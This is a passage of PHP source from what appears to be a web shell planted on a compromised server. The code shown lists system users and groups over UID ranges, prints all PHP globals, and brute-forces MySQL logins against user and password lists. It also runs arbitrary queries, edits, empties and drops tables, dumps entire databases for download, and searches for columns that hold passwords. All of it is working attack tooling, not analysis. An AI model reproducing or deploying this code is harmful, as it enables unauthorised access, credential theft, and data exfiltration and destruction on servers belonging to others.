else $end = 20000;
if(isset($_GET['startg']) && (int)get('startg')) $startg = (int)get('startg');
else $startg = 0;
if(isset($_GET['endg']) && (int)get('endg')) $endg = (int)get('endg');
else $endg = 500;
?>
<form method="get">
<input type="hidden" name="action" value="system" /><br />
<b>UID Range:</b><br />
Start: <input type="text" name="start" value="<?php echo $start; ?>" /><br />
End: <input type="text" name="end" value="<?php echo $end; ?>" /><br />
<b>GID Range:</b><br />
Start: <input type="text" name="startg" value="<?php echo $startg; ?>" /><br />
End: <input type="text" name="endg" value="<?php echo $endg; ?>" /><br />
<input type="submit" />
</form>
<h2>Users</h2>
<ul>
<?php
for($i = $start;$i < $end;$i++) {
$user = posix_getpwuid($i);
if($user) {
echo "<li> <b>".htmlentities($user['name'])."</b>
<blockquote>passwd: ".htmlentities($user['passwd'])."<br /> uid/gid: ".htmlentities($user['uid'])." / ".htmlentities($user['gid'])."<br /><!--gecos: ".htmlentities($user['gecos'])."<br />-->dir: ".htmlentities($user['dir'])."<br /><!--shell: ".htmlentities($user['shell'])."--></blockquote></li>";
} elseif($user === null) {
echo "<li> <b>Error:</b> posix_getpwuid() returned null. Should either return array or false. This most likely means it is disabled on this server. Stopping.</li>";
break;
}

}?>
</ul>
<h2>Groups</h2>
<ul>
<?php
for($i = $startg;$i < $endg;$i++) {
$group = posix_getgrgid($i);
if($group) {
echo "<li> <b>".htmlentities($group['name'])."</b>
<blockquote>passwd: ".htmlentities($group['passwd'])."<br /> gid: ".htmlentities($group['gid'])."<br /> Members: <ul>";
foreach($group['members'] as $member) {
echo "<li>".$member."</li>";
}
echo "</ul></blockquote></li>";
}

}//echo "<pre>";print_r(posix_getgrgid(103));print_r(posix_getgrgid(50));
?>
</ul>
<?php
break;
case "showglobals":
echo "<pre>";
echo htmlentities(print_r($GLOBALS,true));
echo"</pre>";
break;
case "mysql":
switch(get('type')) {
default:
?>
[<a href="?action=mysql&type=bf">Brute Force</a>]
[<a href="?action=mysql&type=query">Query</a>]
[<a href="?action=mysql&type=miniadmin">MiniAdmin</a>]
<?php
break;
case "bruteforce":
case "bf":
if(!post('users') || !post('passes')) {
?>
<form method="POST" action="?action=mysql&type=bruteforce">
<h3 style="margin:2px;">Brute force:</h3>
<textarea name="users" style="width:40%;height:350;"><?php echo (post('users') ? htmlentities(post('users')) : "root\nmysql\n".@get_current_user());?></textarea> <textarea name="passes" style="width:40%;height:350;"><?php echo (post('passes') ? htmlentities(post('passes')) : "\n\nmysql\n".@get_current_user());?></textarea><br>
<input type="submit" value="execute">
</form>
<?php
} else {
$passes = explode("\n",str_replace("\r","",post('passes')));
$users = explode("\n",str_replace("\r","",post('users')));
foreach($users as $user) {
foreach($passes as $pass) {
if(@mysql_pconnect('localhost',$user,$pass)) {
echo "<b>Success</b> with combination: <input type=\"text\" value=\"".htmlentities($user)."\" size=\"12\" />: <input type=\"text\" value=\"".htmlentities($pass)."\" size=\"12\" /><br />";
} else {
echo "Failure with combination: <input type=\"text\" value=\"".htmlentities($user)."\" size=\"12\" />: <input type=\"text\" value=\"".htmlentities($pass)."\" size=\"12\" /><br />";
}
}
}
}
break;
case "query":
if(!isset($_POST['user']) || !isset($_POST['pass']) || !post('query')) {
?>
<form method="post" action="?action=mysql&type=query">
MySQL host: <input type="text" name="host" value="<?php echo (post('host') ? htmlentities(post('host')) : 'localhost'); ?>" /><br />
MySQL user*: <input type="text" name="user" value="<?php echo htmlentities(post('user')); ?>" /><br />
MySQL pass: <input type="text" name="pass" value="<?php echo htmlentities(post('pass')); ?>" /><br />
MySQL database: <input type="text" name="database" value="<?php echo htmlentities(post('database')); ?>" /><br />
<textarea style="width:90%;height:300px;" name="query"><?php echo htmlentities(post('query')); ?></textarea><br />
Queries seperated by newlines.<br />
<input type="checkbox" name="cancelonfail" value="1" <?php if(post('cancelonfail')) echo "CHECKED"; ?>>Stop if a query fails?<br />
<input type="submit" value="Do it!" />
</form>
<b>Useful Queries:</b><br />
<ul>
<li>SHOW DATABASES;</li>
<li>USE <i>[database name]</i>;</li>
<li>SHOW TABLES;</li>
<li>SHOW COLUMNS IN <i>[table name]</i>;</li>
<li>SELECT * FROM <i>[table name]</i> LIMIT <i>1</i>;</li>
<li>SELECT * FROM <i>[table name]</i> WHERE <i>[column name]</i>='<i>value</i>' LIMIT <i>1</i>;</li>
<li>DELETE FROM <i>[table name]</i> WHERE <i>[column name]</i>='<i>value</i>' LIMIT <i>1</i>;</li>
<li>DELETE FROM <i>[table name]</i>;</li>
<li>UPDATE <i>[table name]</i> SET <i>[column name]</i>='<i>value</i>', <i>[column name]</i>='<i>value</i>' WHERE <i>[column name]</i>='<i>value</i>' LIMIT <i>1</i>;</li>
</ul>
<?php
} else {
$connection = @mysql_pconnect((post('host') ? post('host') : 'localhost'),post('user'),post('pass')) or die('<b>Error:</b> Could not connect to the server. Wrong pass/user?');
echo "Connection established.<br />";
if(post('database')) {
@mysql_select_db(post('database'),$connection) or die('<b>Error:</b> no connection to the database. Does it exist?');
echo "Database selected.<br />";
}
$queries = explode("\n",str_replace("\r","",post('query')));
foreach($queries as $query) {
if($query) {
echo "<blockquote>";
if($q = mysql_query($query)) {
$aff_row = mysql_affected_rows();
echo "Query successful! (".$aff_row." affected rows)<br /><input type=\"text\" style=\"width:90%;\" value=\"".htmlentities($query)."\" /><br />";
if(is_resource($q)) {
echo "<b>Query Result:</b><br />";
echo "<blockquote>";
while($qr = mysql_fetch_assoc($q)) {
echo "<pre>".htmlentities(print_r($qr,true))."</pre><hr />";
}
echo "</blockquote>";
} else {
echo "Query is resultless. (this means it's a query that will never return anything - like update or delete, not an empty select)<br />";
}
} else {
echo "<b>Query failed!</b><br />Query: <input type=\"text\" style=\"width:90%;\" value=\"".htmlentities($query)."\" /><br /><b>MySQL error:</b> ".mysql_error()."<br />";
if(post('cancelonfail')) {
echo "</blockquote><hr />Query failed! stopping!<br />";
break;
}
}
echo "</blockquote><hr />";
}
}
echo "All done!<br />";
}
break;
case "miniadmin":
if(isset($_GET['u']) && isset($_GET['p'])) {
$url = $_SERVER['SCRIPT_NAME']."?action=mysql&type=miniadmin&h=".urlencode(get('h'))."&u=".urlencode(get('u'))."&p=".urlencode(get('p'));
if($mcon = @mysql_pconnect((get('h') ? get('h') : 'localhost'),get('u'),get('p'))) {
if(!get('shownone')) {
echo "<b>".htmlentities(get('h'))."</b> - ".htmlentities(get('db'))."<br />";
$databases = mysql_list_dbs();
echo "Databases: | ";
while ($row = mysql_fetch_row($databases)) {
if(get('db') != $row[0]) echo "<a href=\"".$url."&db=".htmlentities(urlencode($row[0]))."\">".$row[0]."</a> | \n";
else echo "<b>".$row[0]."</b> | ";
}
echo "<hr />";
}
if(get('db')) {
$urld = $_SERVER['SCRIPT_NAME']."?action=mysql&type=miniadmin&h=".urlencode(get('h'))."&u=".urlencode(get('u'))."&p=".urlencode(get('p'))."&db=".urlencode(get('db'));
if(@mysql_select_db(get('db'),$mcon)) {
if(!get('shownone')) {
$tables = mysql_query("SHOW TABLES");
if($tables) {
echo "Tables: | ";
while ($row = mysql_fetch_row($tables)) {
if(get('tb') != $row[0]) echo "<a href=\"".$url."&db=".get('db')."&tb=".$row[0]."\">".$row[0]."</a> | \n";
else echo "<b>".$row[0]."</b> | ";
}
echo "<hr />";
} else {
echo "<b>Error:</b> The SHOW TABLES query failed! (".mysql_error().")<hr />";
}
}
if(get('tb')) {
$urlt = $_SERVER['SCRIPT_NAME']."?action=mysql&type=miniadmin&h=".urlencode(get('h'))."&u=".urlencode(get('u'))."&p=".urlencode(get('p'))."&db=".urlencode(get('db'))."&tb=".urlencode(get('tb'));
switch(get('ta')) {
default:
$getcolumns = mysql_query("SHOW COLUMNS IN `".mysql_real_escape_string(get('tb'))."`");
if($getcolumns) {
?><table border="1"><tr><td>Field</td><td>type</td><td>Key</td><td>default</td><td>AI?</td><td>Null?</td></tr><?php
while($column = mysql_fetch_assoc($getcolumns)) {
echo "<tr><td>".htmlentities($column['Field'])."</td><td>".htmlentities($column['Type'])."</td><td>".htmlentities(($column['Key'] ? $column['Key'] : 'none'))."</td><td>".htmlentities($column['Default'])."</td><td>".($column['Extra'] == "auto_increment" ? "y" : "n")."</td><td>".htmlentities($column['Null'])."</td></tr>";
}
?></table><br /><?php
} else die ("<b>Error:</b> Could not retrieve columns!<br />");
list($totalrows) = mysql_fetch_row(mysql_query("SELECT COUNT(1) FROM `".mysql_real_escape_string(get('tb'))."`"));
echo "Number of entries: ".$totalrows."<br />";
echo "<hr />";
break;
case "delrow":
echo "<b>Deleting a row</b><br />";
$iden = get('trid');
if($query = get_iden_query($iden)) {
$getrow = mysql_query("SELECT * FROM `".mysql_real_escape_string(get('tb'))."` WHERE ".$query." LIMIT 1");
if($getrow && $rowdata = mysql_fetch_assoc($getrow)) {
echo "Row found!<br />";
if(!post('sure')) {
echo "<b>Are you sure you want to delete this row?</b><br /><form method='post'><input type='checkbox' name='sure' value='1' />Yes<br /><input type='submit'></form><b>Rowdata:</b><br />";
foreach($rowdata as $key => $val) {
echo "<u>".htmlentities($key)."</u>: <br />";
echo "<textarea>".htmlentities($val)."</textarea><br /><br />";
}
} else {
$quer = "DELETE FROM `".mysql_real_escape_string(get('tb'))."` WHERE ".$query." LIMIT 1";
echo "Query: <input type=\"text\" style=\"width:90%;\" value=\"".htmlentities($quer)."\" /><br />";
if(mysql_query($quer)) {
echo "Deleted row successfully";
} else echo "<b>Mysql error while deleting:</b> ".htmlentities(mysql_error());
}
} else echo "Error: This row could not be found. Have you already deleted it?";
}
echo "<hr />";
break;
case "editrow":
echo "<b>Editing a row</b><br />";
$iden = get('trid');
if($query = get_iden_query($iden)) {
$getrow = mysql_query("SELECT * FROM `".mysql_real_escape_string(get('tb'))."` WHERE ".$query." LIMIT 1");
if($getrow && $rowdata = mysql_fetch_assoc($getrow)) {
echo "Row found!<br /><br />";
if(!$_POST) {
echo "<form method='post'><b>Edit the values below:</b><br />";
foreach($rowdata as $key => $val) {
echo "<u>".htmlentities($key)."</u>: <br />";
echo "<textarea style='width:90%;height:110px;' name=\"".htmlentities($key)."\">".htmlentities($val)."</textarea><br /><br />";
}
echo "<input type='submit' value='Edit!' /></form>";
} else {
$q2 = "";
foreach($rowdata as $key => $val) {
if(isset($_POST[$key]) && post($key) != $val) $q2 .= ($q2 ? ', ' : '')."`".$key."`='".post($key)."'";
}
if($q2) {
$quer = "UPDATE `".mysql_real_escape_string(get('tb'))."` SET ".$q2." WHERE ".$query." LIMIT 1";
echo "Query: <input type=\"text\" style=\"width:90%;\" value=\"".htmlentities($quer)."\" /><br />";
if(mysql_query($quer)) {
echo "Edited row successfully";
} else echo "<b>Mysql error while editing:</b> ".htmlentities(mysql_error());
} else echo "Error: You didn't change any rows!";
}
} else echo "Error: This row could not be found. Have you already deleted it?";
}
echo "<hr />";
break;
case "view":
$getcolumns = mysql_query("SHOW COLUMNS IN `".mysql_real_escape_string(get('tb'))."`");
if($getcolumns) {
$columns = array();
while($column = mysql_fetch_assoc($getcolumns)) {
$columns[] = $column;
}
} else die("<b>Error:</b> Could not retrieve columns! (".mysql_error().")<br />");
$s = ((int)get('s') ? (int)get('s') : 0);
$n = ((int)get('n') ? (int)get('n') : 100);
$limit = $s.",".$n;

$userwhere = "";
if(get('cwhere')) {
//if(substr(trim(get('cwhere')),0,5) != 'where') $userwhere = "WHERE ".get('chwere');
$userwhere = get('cwhere');
}

$query = "SELECT * FROM `".mysql_real_escape_string(get('tb'))."` ".$userwhere." LIMIT ".$limit;
$getrows = mysql_query($query);
echo 'Query: <input type="text" value="'.htmlentities($query).'" size="100" /><br />';
echo '<form method="get" style="display:inline;">';
foreach($_GET as $k => $v) if(!in_array($k,array("s","cwhere"))) echo "<input type=\"hidden\" name=\"".htmlentities($k)."\" value=\"".htmlentities($v)."\" />";
echo 'Your custom additions: <input type="text" name="cwhere" value="'.(get('cwhere') ? htmlentities(get('cwhere')) : 'WHERE 1').'" size="60" /><input type="submit" value="change query"></form><br />';
if($getrows) {
list($totalrows) = mysql_fetch_row(mysql_query("SELECT COUNT(1) FROM `".mysql_real_escape_string(get('tb'))."` ".$userwhere));
echo '<b>Page '.($n ? ($s/$n)+1 : 1).'</b> (Selecting '.$n.' out of a total of '.$totalrows.' rows, starting at '.$s.')<br />';
if(($s-$n) >= 0) echo '[<a href="'.$urlt.'&ta=view&s='.($s-$n).'&n='.$n.(get('cwhere') ? '&cwhere='.htmlentities(urlencode(get('cwhere'))) : '' ).'">&lt;&lt;Page</a>]';
if(($s+$n) <= $totalrows) echo '[<a href="'.$urlt.'&ta=view&s='.($s+$n).'&n='.$n.(get('cwhere') ? '&cwhere='.htmlentities(urlencode(get('cwhere'))) : '' ).'">Page&gt;&gt;</a>]';
echo "<table border='1'>\n<tr>";
echo "<td>#</td><td></td>";
$prim = array();
foreach($columns as $column) {
echo "<td>".($column['Key'] ? "<b>" : "").htmlentities($column['Field']).($column['Key'] ? "</b>" : "")." <i>(".htmlentities($column['Type']).")</i></td>";
if($column['Key'] == "PRI") $prim[] = $column;
}
if(!$prim) $prim = $columns;
echo "</tr>\n";
$i = $s;
while($row = mysql_fetch_assoc($getrows)) {
$outp = "";
$primaries = "";
foreach($columns as $column) {
if(in_array($column,$prim)) $primaries .= ($primaries ? "&" : "").urlencode($column['Field'])."=".htmlentities(urlencode($row[$column['Field']]));
$outp .= "<td>";
$size = 0;
if(strpos($column['Type'],"(") === false) list($type) = explode("(",str_replace(")","",$column['Type']),2);
else list($type,$size) = explode("(",str_replace(")","",$column['Type']),2);
$size = intval($size);
switch($type) {
default: $outp .= htmlentities($row[$column['Field']]); break;
case "int": $outp .= $row[$column['Field']]; break;
case "varchar": case "char": $outp .= '<input type="text" size="'.(($size > 0 && $size < 20) ? $size : 25).'" value="'.htmlentities($row[$column['Field']]).'" />'; break;
case "text": case "longtext": $outp .= '<textarea style="width:200px; height:50px;">'.htmlentities($row[$column['Field']]).'</textarea>'; break;
}
$outp .= "</td>";
}
$identification = "trid=".base64_encode($primaries);
echo "<tr ".(($i%2) ? 'bgcolor="#EEEEEE"' : '')."><td>".$i."</td><td><a href='".$urlt."&ta=delrow&".$identification."'>X</a> <a href='".$urlt."&ta=editrow&".$identification."'>E</a></td>";
$outp .= "</tr>\n";
echo $outp;
$i++;
}
echo "</table>";
if(($s-$n) >= 0) echo '[<a href="'.$urlt.'&ta=view&s='.($s-$n).'&n='.$n.(get('cwhere') ? '&cwhere='.htmlentities(urlencode(get('cwhere'))) : '' ).'">&lt;&lt;Page</a>]';
if(($s+$n) <= $totalrows) echo '[<a href="'.$urlt.'&ta=view&s='.($s+$n).'&n='.$n.(get('cwhere') ? '&cwhere='.htmlentities(urlencode(get('cwhere'))) : '' ).'">Page&gt;&gt;</a>]';
} else echo "<b>Error:</b> Could not get data due to mysql error (".mysql_error().")<br />";
echo "<hr />";
break;
case "empty":
if(post('sure')) {
$query = "DELETE FROM `".mysql_real_escape_string(get('tb'))."`";
echo 'Query: <input type="text" value="'.htmlentities($query).'" size="100" /><br />';
if(mysql_query($query)) echo "Successfully emptied the table!<br />";
else echo "MySQL error while emptying table: ".mysql_error()."<br />";
} else {
?>
<form method="post" action="<?php echo htmlentities($urlt);?>&ta=empty">Are you sure you want to empty the table '<?php echo htmlentities(get('tb')); ?>'? This cannot be reversed. <br /><input type="checkbox" name="sure" value="1" />Yes.<br /><input type="submit" value="Yes" /></form>
<?php
}
echo "<hr />";
break;
case "drop":
if(post('sure')) {
$query = "DROP TABLE `".mysql_real_escape_string(get('tb'))."`";
echo 'Query: <input type="text" value="'.htmlentities($query).'" size="100" /><br />';
if(mysql_query($query)) echo "Successfully dropped the table!<br />";
else echo "MySQL error while dropping the table: ".mysql_error()."<br />";
} else {
?>
<form method="post" action="<?php echo htmlentities($urlt);?>&ta=drop">Are you sure you want to drop the table '<?php echo htmlentities(get('tb')); ?>'? This cannot be reversed. <br /><input type="checkbox" name="sure" value="1" />Yes.<br /><input type="submit" value="Yes" /></form>
<?php
}
echo "<hr />";
break;
case "dlsql":
@header("Content-Disposition: attachment; filename=\"".get('h')."-".get('db')."-".get('tb').".sql\"");
@header("Content-type: text/plain");
list($ver) = mysql_fetch_row(mysql_query("SELECT @@version"));
echo "-- - table structure: ".get('h')." / ".get('db')." / ".get('tb')."\n-- -".date('r')."\n-- - mysql user: ".get('u')." MySQL version: ".$ver."\n";
gettablesql(get('tb'));
exit;
break;
case "dlsqldump":
@set_time_limit(0);
@header("Content-Disposition: attachment; filename=\"".get('h')."-".get('db')."-".get('tb')."-data.sql\"");
@header("Content-type: text/plain");
list($ver) = mysql_fetch_row(mysql_query("SELECT @@version"));
echo "-- - table dump: ".get('h')." / ".get('db')." / ".get('tb')."\n-- - ".date('r')."\n-- - mysql user: ".get('u')." MySQL version: ".$ver."\n";
gettablesql(get('tb'));
gettablecontentsql(get('tb'),((int)get('break') ? (int)get('break') : 100));
exit;
break;
}
if(!get('shownone')) {
echo '<b>Table actions:</b><br />[<a href="'.$urlt.'&ta=view&s=0&n=10">view data</a> 10/page] [<a href="'.$urlt.'&ta=view&s=0&n=50">view data</a> 50/page] [<a href="'.$urlt.'&ta=view&s=0&n=100">view data</a> 100/page] [<a href="'.$urlt.'&ta=view&s=0&n=200">view data</a> 200/page] [<a href="'.$urlt.'&ta=view&s=0&n=500">view data</a> 500/page] [<a href="'.$urlt.'&ta=view&s=0&n=1000">view data</a> 1000/page]<br />';
echo '[<a href="'.$urlt.'">view structure</a>] [<a href="'.$urlt.'&ta=empty">empty</a>] [<a href="'.$urlt.'&ta=drop">drop</a>] [<a href="'.$urlt.'&ta=insert">insert</a>] [<a href="'.$urlt.'&ta=dlsql&shownone=1">download table structure (sql)</a>] [<a href="'.$urlt.'&ta=dlsqldump&shownone=1">download table dump (sql)</a>]';
echo "<hr />";
}
} else {//no table selected
switch(get('da')) {
default:

break;
case "dlsql":
@header("Content-Disposition: attachment; filename=\"".get('h')."-".get('db').".sql\"");
@header("Content-type: text/plain");
$gettables = mysql_query("SHOW TABLES");
$tables = array();
echo "-- - Database structure: ".get('h')." / ".get('db')."\n-- -".date('r')."\n";
while($table= mysql_fetch_row($gettables)) {
gettablesql($table[0]);
}
break;
case "dlsqldump":
@set_time_limit(0);
@header("Content-Disposition: attachment; filename=\"".get('h')."-".get('db')."-data.sql\"");
@header("Content-type: text/plain");
$gettables = mysql_query("SHOW TABLES");
$tables = array();
list($ver) = mysql_fetch_row(mysql_query("SELECT @@version"));
echo "-- - Database dump: ".get('h')." / ".get('db')."\n-- -".date('r')."\n-- - mysql user: ".get('u')." MySQL version: ".$ver."\n";
while($table= mysql_fetch_row($gettables)) {
echo "\n-- - Table structure: ".$table[0]."\n";
gettablesql($table[0]);
echo "\n-- - Table data: ".$table[0]."\n";
gettablecontentsql($table[0],((int)get('break') ? (int)get('break') : 1000));
echo "\n\n";
}
exit;
break;

}
}
if(!get('shownone')) echo '<b>Database actions:</b> <br />[<a href="'.$urld.'&da=dlsql&shownone=1">download database structure (sql)</a>] [<a href="'.$urld.'&da=dlsqldump&shownone=1">download database dump (sql)</a>] <hr />';

} else {
die( "<b>Error:</b> Selected database does not exist/can't be accessed.<br />");
}
} else {
switch(get('a')) {
case "findpwcols":
echo "<b>Finding columns containing 'pass' or 'pw'</b><br />";
$needle = array('pass','pw');
findindb($needle,'col');
echo "<hr />";
break;
case "find":
if(post('find')) {
echo "<b>Finding columns containing ".htmlentities(post('find'))."</b><br />";
$needle = explode(",",str_replace(" ","",post('find')));
if(post('type') == 'col') findindb($needle,'col',(post('stype') == 1));
else findindb($needle,'table',(post('stype') == 1));
echo "<hr />";
} else {
?>
<form method="POST" action="<?php echo htmlentities($_SERVER['REQUEST_URI']); ?>">
Find<br />
<input type="radio" name="type" value="col" />columns <input type="radio" name="type" value="table" /> tables<br />
<input type="radio" name="stype" value="0" />containing <input type="radio" name="stype" value="1" /> named<br />
<input type="text" name="find" value="" /> (Separated by comma)<br />
<input type="submit" value="Do it!" />
</form>
<?php
}
break;
case "dlsql":
@header("Content-Disposition: attachment; filename=\"".get('h')."-alldbs.sql\"");
@header("Content-type: text/plain");
$dbprefix = preg_replace('~^([^\\d\\w_\\-]*)$~is','',get('dbprefix'));
$onlywithprefix = preg_replace('~^([^\\d\\w_\\-]*)$~is','',get('onlywithprefix'));
$getdatabases = mysql_list_dbs();
if($onlywithprefix ) echo "-- - Only tables with prefix: ".$onlywithprefix."\n";
while ($db = mysql_fetch_row($getdatabases)) {
if(!$onlywithprefix || substr($db[0],0,strtolower(strlen($onlywithprefix))) == strtolower($onlywithprefix)) {
mysql_query("USE `".$db[0]."`");
$gettables = mysql_query("SHOW TABLES");
$tables = array();
echo "-- - Database structure: ".get('h')." / ".$db[0]."\n-- - ".date('r')."\n";
if($dbprefix) echo "-- - Added prefix: ".$dbprefix."\n";
echo "CREATE DATABASE `".$dbprefix.$db[0]."`;\n";
echo "USE `".$dbprefix.$db[0]."`;\n\n";
while($table= mysql_fetch_row($gettables)) {
gettablesql($table[0]);
}
} else {
echo "-- - Skipping database: ".$db[0].", because of wrong prefix.\n";
}
}
exit;
break;
}
if(!get('shownone')) echo "<hr />";
}
if(!get('shownone')) echo '<b>General actions:</b> <br />[<a href="'.$url.'&a=findpwcols">Find columns probably containing passwords</a>] [<a href="'.$url.'&a=find">Search columns/tables</a>] [<a href="'.$url.'&a=dlsql&shownone=1">Download structure of all databases</a>]';
} else {
echo "<b>Error:</b> Could not connect to server (wrong pass?)<br />";
$needlogin = 1;
}
} else $needlogin = 1;
if(isset($needlogin)) {
?>
<form method="GET" action="<?php echo htmlentities($_SERVER['SCRIPT_NAME']); ?>">
<input type="hidden" name="action" value="mysql" />
<input type="hidden" name="type" value="miniadmin" />
Host: <input type="text" name="h" value="<?php echo (get('h') ? get('h') : 'localhost'); ?>" /><br />
MySQL user: <input type="text" name="u" value="<?php echo get('u') ?>" /><br />
MySQL pass: <input type="text" name="p" value="<?php echo get('p') ?>" /><br />
<input type="submit" value="Go!" />
</form>
<?php
}
break;

}
break;
}
?>